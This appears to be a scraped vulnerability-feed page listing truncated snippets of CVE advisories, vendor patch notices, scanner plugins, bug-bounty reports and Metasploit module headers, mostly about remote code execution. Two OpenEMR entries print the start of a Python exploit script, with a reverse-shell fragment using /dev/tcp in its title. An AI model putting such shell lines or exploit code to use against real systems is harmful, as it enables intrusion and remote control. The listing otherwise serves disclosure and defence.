Remote Code Execution (RCE)

laravel/framework is vulnerable to remote code execution RCE. It can occur because there is an unserialized call on the potentially untrusted X-XSRF-TOKEN value. The attacker can execute arbitrary code when decrypting certain files if they have access to the application key...

openSUSE Security Update : gdk-pixbuf (openSUSE-2018-846)

This update for gdk-pixbuf fixes the following issues : Security issue fixed : - CVE-2015-4491: Fix integer multiplication overflow that allows for DoS or potentially RCE bsc1053417. This update was imported from the SUSE:SLE-12-SP2:Update update project. %NASLMINLEVEL 70300 C Tenable Network...

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

OpenEMR 5.0.1.3 Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

CVE-2017-9001

Aruba ClearPass 6.6.3 and later includes an optional SSH Lockout feature. When this feature is enabled, the system is vulnerable to an unauthenticated remote command execution that can grant root privileges on the underlying OS. The vulnerability only exists for systems where SSH Lockout is enabl...

Node.js third-party modules: Code Injection Vulnerability in morgan Package

I would like to report a code injection vulnerability in morgan. It allows an attacker to inject arbitrary JS commands in certain situations. Module module name: morgan version: 1.9.0 npm page: https://www.npmjs.com/package/morgan Module Description HTTP request logger middleware for node.js Name...

NUUO NVR < 3.10.0 RCE Vulnerability - Active Check

NUUO NVR devices are prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2018 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

SUSE SLED12 / SLES12 Security Update : gdk-pixbuf (SUSE-SU-2018:2145-1)

This update for gdk-pixbuf fixes the following issues: Security issue fixed : - CVE-2015-4491: Fix integer multiplication overflow that allows for DoS or potentially RCE bsc1053417. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security...

SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SonicWall Global Management System XMLRPC settimezone Unath RCE", 'Description' = %q This module exploits a vulnerability in SonicWall Global...

CVE-2018-14286

Foxit Reader: CVE-2018-14286 is a type-confusion remote-code-execution vulnerability in the mailDoc argument handling. It affects Foxit Reader 9.0.1.1049 and earlier; exploitation requires user interaction (visiting a malicious page or opening a malicious file). Root cause: improper validation of...

The first Spark REST API is not authorized to exploit analysis-exploit warning-the black bar safety net

2018 7 on 7 May, Ali Cloud Security for the first time to capture the Spark REST API unauthorized RCE vulnerability to attack of real samples. 7 on number 9 plays, Ali Cloud Platform has been able to the default of Defense the vulnerability of the large-scale use. This is the first time in...

Bugs in Samsung IoT Hub Leave Smart Home Open To Attack

Researchers found 20 vulnerabilities in Samsung’s SmartThings Hub, allowing attackers to control smart locks, remotely monitor the home via connected cameras and perform other alarming functions. Cisco Talos researchers, who published a technical breakdown of the vulnerabilities on Thursday, said...

Axis Network Camera Remote Command Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Axis Network Camera .srv to parhand RCE', 'Description' = %q This module exploits an auth bypass in .srv functionality and a command injection in...

(0Day) Wecon LeviStudioU PartInfo PartName Heap-based Buffer Overflow Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling o...

Oracle Secure Global Desktop Multiple Vulnerabilities (July 2018 CPU)

The version of Oracle Secure Global Desktop installed on the remote host is 5.3 / 5.4 and is missing a security patch from the July 2018 Critical Patch Update CPU. It is, therefore, affected by multiple vulnerabilities: - curl version curl 7.54.1 to and including curl 7.59.0 contains a Heap-based...

Remote code execution

Pydio version 8.2.1 and prior contains an Unvalidated user input leading to Remote Code Execution RCE vulnerability in plugins/action.antivirus/AntivirusScanner.php: Line 124, scanNow$nodeObject that can result in An attacker gaining admin access and can then execute arbitrary commands on the...

CVE-2018-1999018

Pydio version 8.2.1 and prior contains an Unvalidated user input leading to Remote Code Execution RCE vulnerability in plugins/action.antivirus/AntivirusScanner.php: Line 124, scanNow$nodeObject that can result in An attacker gaining admin access and can then execute arbitrary commands on the...

CVE-2018-1999018

Pydio version 8.2.1 and prior contains an Unvalidated user input leading to Remote Code Execution RCE vulnerability in plugins/action.antivirus/AntivirusScanner.php: Line 124, scanNow$nodeObject that can result in An attacker gaining admin access and can then execute arbitrary commands on the...

CVE-2018-1999018

CVE-2018-1999018 affects Pydio v8.2.1 and earlier. The root cause is unvalidated user input in the AntivirusScanner.php (plugins/action.antivirus/AntivirusScanner.php) function scanNow($nodeObject), enabling Remote Code Execution. The vulnerability can allow an attacker with access to edit the An...

U.S. Dept Of Defense: SQL Injection vulnerability located at ████████

Summary: I have found a SQL Injection at ███████ in the ████ Portal. Description: The SQL injection is being caused by the unsanitized parameter of itemID= i immediately stopped testing when i verified it was possible to get the Current user and version of the Database. 1.The vulnerable url is :...